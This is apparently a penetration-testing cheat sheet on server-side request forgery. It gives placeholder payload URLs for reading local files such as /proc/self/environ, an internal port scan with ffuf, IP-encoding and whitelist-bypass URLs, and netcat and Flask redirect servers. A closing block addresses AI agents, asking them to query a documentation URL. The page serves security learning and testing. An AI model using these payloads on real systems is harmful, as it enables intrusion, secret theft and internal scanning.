# SSRF

It occurs when an application accepts input from the user (URL, GET, POST, HEADER, PARAMETER, etc.), which is not properly verified, to make HTTP requests to another internal or external resource.

**Types**: In-Band and Blind.

## Payload

[URL validation bypass](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet)

### Remote files

{% code overflow="wrap" %}

```url
http://<TARGET>/load?q=http://<IP>:<PORT>
```

{% endcode %}

### Local files

{% code overflow="wrap" %}

```url
http://<TARGET>/load?q=file://<ABSOLUTE_PATH>
http://<TARGET>/load?q=file:///proc/self/environ  # environment variables, like pwd
```

{% endcode %}

### Port Scanning

{% code overflow="wrap" %}

```bash
for port in {1..65535};do echo $port >> ports.txt; done
```

{% endcode %}

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>curl -i -s "http://&#x3C;TARGET_IP>/load?q=http://127.0.0.1:1”
</strong># recovery length closed door
</code></pre>

{% code overflow="wrap" %}

```bash
ffuf -w ./ports.txt:PORT -u "http://<TARGET_IP>/load?q=http://127.0.0.1:PORT" -fs 30
```

{% endcode %}

## Encoding IP

<table data-header-hidden><thead><tr><th width="242"></th><th></th></tr></thead><tbody><tr><td>Abbreviations</td><td><code>127.1</code></td></tr><tr><td><a href="https://www.ipaddressguide.com/ip">Decimal</a></td><td><code>2130706433</code></td></tr><tr><td><a href="https://www.browserling.com/tools/ip-to-oct">Octal</a></td><td><code>0177.0000.0000.0001</code> (<code>017700000001</code>)</td></tr></tbody></table>

```url
http://127.0.0.1#@whitelist.net
http://127.0.0.1%23@whitelist.net
http://127.0.0.1%2523@whitelist.net
http://whitelist.net#@127.0.0.1
http://whitelist.net%23@127.0.0.1
http://whitelist.net%2523@127.0.0.1
```

## HTTP Redirection

Server Redirection

{% code overflow="wrap" %}

```bash
echo -e "HTTP/1.1 302 Found\nLocation: <TARGET_SITE>\n" | nc -lnvp 80
```

{% endcode %}

{% code overflow="wrap" %}

```python
from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def redirect_to_new_page():
    return redirect('<TARGET_SITE>', code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```

{% endcode %}

{% code overflow="wrap" %}

```python
from flask import Flask, redirect, make_response

app = Flask(__name__)

@app.route('/')
def index():
    # Create a response with a redirect and set the desired content type.
    response = make_response(redirect('http://0.0.0.0/internal.php'))
    response.headers['Content-Type'] = 'image/png'
    return response

if __name__ == '__main__':
    app.run(debug=True)
```

{% endcode %}

## DNS Rebinding

Set up a DNS server that performs constant switching between two IPs.\
Use [Rebinder](https://lock.cmpxchg8b.com/rebinder.html), set up the two ip's for continuous switching, get the domain to use.

## Inconsistencies on URL Parser

[A New Era of SSRF - Black Hat  USA 2017](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ivalexev.gitbook.io/rednote/pentesting-process/web-attacks/ssrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.